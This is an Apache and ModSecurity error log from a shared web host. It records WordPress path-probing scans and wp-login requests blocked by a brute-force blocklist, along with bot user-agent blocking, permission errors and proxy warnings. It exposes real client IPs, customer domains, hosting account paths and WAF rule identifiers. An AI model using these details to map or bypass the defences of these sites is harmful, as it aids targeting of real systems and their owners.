[Tue May 26 15:16:28.910647 2026] [security2:error] [pid 700087:tid 700246] [client 136.118.18.34:60547] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahVr9JPHQM4as9fEIIaIOgAAAB0"]
[Tue May 26 15:16:29.455022 2026] [security2:error] [pid 700087:tid 700326] [client 136.118.18.34:53230] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVr9ZPHQM4as9fEIIaISwAAAG0"]
[Tue May 26 15:16:29.780118 2026] [security2:error] [pid 700087:tid 700240] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr9ZPHQM4as9fEIIaIRwAAABc"]
[Tue May 26 15:16:30.072929 2026] [security2:error] [pid 700087:tid 700293] [client 136.118.18.34:55198] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahVr9pPHQM4as9fEIIaIYQAAAEw"]
[Tue May 26 15:16:31.072592 2026] [security2:error] [pid 700087:tid 700227] [client 136.118.18.34:58140] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahVr95PHQM4as9fEIIaIfQAAAAo"]
[Tue May 26 15:16:31.463556 2026] [security2:error] [pid 700087:tid 700256] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr95PHQM4as9fEIIaIfAAAACc"]
[Tue May 26 15:16:31.585583 2026] [security2:error] [pid 700087:tid 700286] [client 136.118.18.34:58341] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVr95PHQM4as9fEIIaIlQAAAEU"]
[Tue May 26 15:16:32.156415 2026] [security2:error] [pid 700087:tid 700344] [client 136.118.18.34:50439] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahVr-JPHQM4as9fEIIaIpwAAAH8"]
[Tue May 26 15:16:32.588957 2026] [security2:error] [pid 700087:tid 700322] [client 136.118.18.34:50439] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVr-JPHQM4as9fEIIaIuQAAAGk"]
[Tue May 26 15:16:32.942149 2026] [security2:error] [pid 700087:tid 700251] [client 136.118.18.34:56570] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "murugaa.in.freshmindsolutions.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVr-JPHQM4as9fEIIaIvQAAACI"]
[Tue May 26 15:16:33.450559 2026] [security2:error] [pid 700087:tid 700311] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr-ZPHQM4as9fEIIaIxgAAAF4"]
[Tue May 26 15:16:33.965030 2026] [core:crit] [pid 700087:tid 700334] (13)Permission denied: [client 40.77.167.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:16:34.066897 2026] [core:crit] [pid 700087:tid 700270] (13)Permission denied: [client 40.77.167.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:16:34.904100 2026] [core:crit] [pid 700087:tid 700316] (13)Permission denied: [client 40.77.167.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:16:35.829668 2026] [security2:error] [pid 700087:tid 700237] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr-5PHQM4as9fEIIaJHgAAABQ"]
[Tue May 26 15:16:37.689579 2026] [security2:error] [pid 700087:tid 700300] [client 66.249.70.140:46324] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVr_ZPHQM4as9fEIIaJZwAAAFM"]
[Tue May 26 15:16:37.858423 2026] [proxy:warn] [pid 700087:tid 700228] [client 66.132.186.197:32648] AH01092: no HTTP 0.9 request (with no host line) on incoming request and preserve host set forcing hostname to be thedebateafrica.org for uri /400.shtml
[Tue May 26 15:16:37.858464 2026] [proxy:error] [pid 700087:tid 700228] (70014)End of file found: [client 66.132.186.197:32648] AH01095: prefetch request body failed to 127.0.0.1:8080 (127.0.0.1) from 66.132.186.197 ()
[Tue May 26 15:16:38.436319 2026] [security2:error] [pid 700087:tid 700254] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr_pPHQM4as9fEIIaJhwAAACU"]
[Tue May 26 15:16:39.398691 2026] [security2:error] [pid 700087:tid 700267] [client 85.208.96.205:57782] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVr_5PHQM4as9fEIIaJrAAAADI"]
[Tue May 26 15:16:39.398815 2026] [security2:error] [pid 700087:tid 700267] [client 85.208.96.205:57782] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/"] [unique_id "ahVr_5PHQM4as9fEIIaJrAAAADI"]
[Tue May 26 15:16:40.109785 2026] [security2:error] [pid 700087:tid 700308] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVr_5PHQM4as9fEIIaJvwAAAFs"]
[Tue May 26 15:16:42.152594 2026] [security2:error] [pid 700087:tid 700332] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsAZPHQM4as9fEIIaKEAAAAHM"]
[Tue May 26 15:16:44.894195 2026] [security2:error] [pid 700087:tid 700240] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsBJPHQM4as9fEIIaLDwAAABc"]
[Tue May 26 15:16:45.656709 2026] [security2:error] [pid 700087:tid 700261] [client 114.119.150.166:56133] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "glorodavionics.com"] [uri "/index.php"] [unique_id "ahVsBZPHQM4as9fEIIaLLQAAACw"], referer: http://glorodavionics.com/index.php?route=affiliate/forgotten
[Tue May 26 15:16:47.602255 2026] [security2:error] [pid 700087:tid 700236] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsB5PHQM4as9fEIIaLYAAAABM"]
[Tue May 26 15:16:49.184402 2026] [security2:error] [pid 700087:tid 700222] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsCJPHQM4as9fEIIaLqgAAAAU"]
[Tue May 26 15:16:49.290031 2026] [security2:error] [pid 700087:tid 700294] [client 208.91.198.85:36246] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/wp-cron.php"] [unique_id "ahVsCZPHQM4as9fEIIaLvwAAAE0"]
[Tue May 26 15:16:50.064132 2026] [core:crit] [pid 700087:tid 700296] (13)Permission denied: [client 40.77.167.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:16:50.912575 2026] [core:crit] [pid 700087:tid 700337] (13)Permission denied: [client 40.77.167.7:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:16:51.801619 2026] [security2:error] [pid 700087:tid 700264] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsC5PHQM4as9fEIIaMFQAAAC8"]
[Tue May 26 15:16:53.597334 2026] [security2:error] [pid 700087:tid 700326] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsDZPHQM4as9fEIIaMXgAAAG0"]
[Tue May 26 15:16:53.728312 2026] [security2:error] [pid 700087:tid 700160] [remote 45.250.255.226:34430] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 226.255.250.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVsDZPHQM4as9fEIIaMdwAAFkg"]
[Tue May 26 15:16:55.674579 2026] [security2:error] [pid 700087:tid 700290] [client 45.151.139.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVsD5PHQM4as9fEIIaMwQAAAEk"], referer: https://anujtradingco.com
[Tue May 26 15:16:55.740104 2026] [security2:error] [pid 700087:tid 700325] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsD5PHQM4as9fEIIaMsgAAAGw"]
[Tue May 26 15:16:57.204100 2026] [security2:error] [pid 700087:tid 700277] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsEJPHQM4as9fEIIaM7wAAADw"]
[Tue May 26 15:16:58.652493 2026] [security2:error] [pid 700087:tid 700281] [client 69.245.102.200:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsEpPHQM4as9fEIIaNMwAAAEA"]
[Tue May 26 15:16:59.573850 2026] [security2:error] [pid 700087:tid 700264] [client 74.7.228.30:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "shop.taotechservices.com"] [uri "/index.php"] [unique_id "ahVsE5PHQM4as9fEIIaNbAAAAC8"]
[Tue May 26 15:16:59.574858 2026] [security2:error] [pid 700087:tid 700232] [client 74.7.228.30:43180] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "500"] [hostname "shop.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahVsE5PHQM4as9fEIIaNagAAD1k"]
[Tue May 26 15:16:59.970870 2026] [security2:error] [pid 700087:tid 700310] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsE5PHQM4as9fEIIaNbwAAAF0"]
[Tue May 26 15:17:01.794020 2026] [security2:error] [pid 700087:tid 700221] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsFZPHQM4as9fEIIaNtAAAAAQ"]
[Tue May 26 15:17:04.589257 2026] [security2:error] [pid 700087:tid 700265] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsGJPHQM4as9fEIIaOIQAAADA"]
[Tue May 26 15:17:06.441478 2026] [security2:error] [pid 700087:tid 700335] [client 31.57.184.107:59122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.centrefororalhealth.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahVsGpPHQM4as9fEIIaOdAAAAHY"]
[Tue May 26 15:17:06.523383 2026] [security2:error] [pid 700087:tid 700324] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsGpPHQM4as9fEIIaObQAAAGs"]
[Tue May 26 15:17:07.082775 2026] [security2:error] [pid 700087:tid 700262] [client 121.237.36.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahVsGZPHQM4as9fEIIaOTQAAAC0"]
[Tue May 26 15:17:08.264329 2026] [security2:error] [pid 700087:tid 700318] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsG5PHQM4as9fEIIaOpAAAAGU"]
[Tue May 26 15:17:08.559588 2026] [core:crit] [pid 700087:tid 700320] (13)Permission denied: [client 157.55.39.204:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 15:17:08.993655 2026] [security2:error] [pid 700087:tid 700328] [client 141.98.134.156:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVsHJPHQM4as9fEIIaOygAAAG8"], referer: https://www.anujtradingco.com/
[Tue May 26 15:17:09.929450 2026] [security2:error] [pid 700087:tid 700311] [client 141.98.134.156:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVsHZPHQM4as9fEIIaO6gAAAF4"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1221078&moderation-hash=52e760096a521f8792a8c9c0d393dc04
[Tue May 26 15:17:10.925007 2026] [security2:error] [pid 700087:tid 700269] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsHpPHQM4as9fEIIaPAgAAADQ"]
[Tue May 26 15:17:10.990969 2026] [security2:error] [pid 700087:tid 700282] [client 63.178.84.147:56542] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahVsHpPHQM4as9fEIIaPFQAAAEE"], referer: http://ucdc.co.in/
[Tue May 26 15:17:12.961131 2026] [security2:error] [pid 700087:tid 700328] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsIJPHQM4as9fEIIaPSAAAAG8"]
[Tue May 26 15:17:13.171334 2026] [security2:error] [pid 700087:tid 700287] [client 141.98.134.156:58177] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahVsIJPHQM4as9fEIIaPTgAAAEY"], referer: https://anujtradingco.com
[Tue May 26 15:17:14.470670 2026] [security2:error] [pid 700087:tid 700262] [client 43.173.173.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVsIpPHQM4as9fEIIaPlAAAAC0"]
[Tue May 26 15:17:14.763912 2026] [security2:error] [pid 700087:tid 700265] [client 114.119.158.156:20871] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "m2wealthadvisor.com"] [uri "/fodderccee/dbeaea1103851.jsp"] [unique_id "ahVsIpPHQM4as9fEIIaPqwAAADA"], referer: https://m2wealthadvisor.com/fodderccee/dbeaea1103851.jsp
[Tue May 26 15:17:15.267790 2026] [security2:error] [pid 700087:tid 700237] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsIpPHQM4as9fEIIaPrAAAABQ"]
[Tue May 26 15:17:16.609984 2026] [security2:error] [pid 700087:tid 700267] [client 15.204.93.212:43918] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahVsJJPHQM4as9fEIIaP5wAAMgw"]
[Tue May 26 15:17:16.617907 2026] [security2:error] [pid 700087:tid 700309] [client 15.204.93.212:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahVsJJPHQM4as9fEIIaP7AAAAFw"]
[Tue May 26 15:17:16.682072 2026] [security2:error] [pid 700087:tid 700297] [client 216.244.66.241:42780] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "ghanemgh.com"] [uri "/hulsterebda/cfaaee1736825.shtml"] [unique_id "ahVsJJPHQM4as9fEIIaP8gAAAFA"]
[Tue May 26 15:17:16.682171 2026] [security2:error] [pid 700087:tid 700297] [client 216.244.66.241:42780] ModSecurity: Warning. Matched phrase "Dotbot" at REQUEST_HEADERS:User-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "ghanemgh.com"] [uri "/hulsterebda/cfaaee1736825.shtml"] [unique_id "ahVsJJPHQM4as9fEIIaP8gAAAFA"]
[Tue May 26 15:17:17.527434 2026] [security2:error] [pid 700087:tid 700294] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsJZPHQM4as9fEIIaP_QAAAE0"]
[Tue May 26 15:17:18.519097 2026] [security2:error] [pid 700087:tid 700260] [client 43.173.181.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVsJpPHQM4as9fEIIaQMwAAACs"]
[Tue May 26 15:17:18.715097 2026] [security2:error] [pid 700087:tid 700222] [client 43.172.198.123:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahVsJpPHQM4as9fEIIaQNwAAAAU"]
[Tue May 26 15:17:19.772119 2026] [security2:error] [pid 700087:tid 700300] [client 37.139.53.229:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVsJ5PHQM4as9fEIIaQcwAAAFM"], referer: https://www.anujtradingco.com/
[Tue May 26 15:17:20.154602 2026] [autoindex:error] [pid 700087:tid 700312] [client 185.247.137.35:0] AH01276: Cannot serve directory /home2/glorolle/public_html/glorodbalsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:17:20.164036 2026] [security2:error] [pid 700087:tid 700237] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVsJ5PHQM4as9fEIIaQewAAABQ"]
[Tue May 26 15:17:20.281192 2026] [security2:error] [pid 700087:tid 700280] [client 121.237.36.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.yourstorybag.com"] [uri "/index.php"] [unique_id "ahVsKJPHQM4as9fEIIaQigAAAD8"]
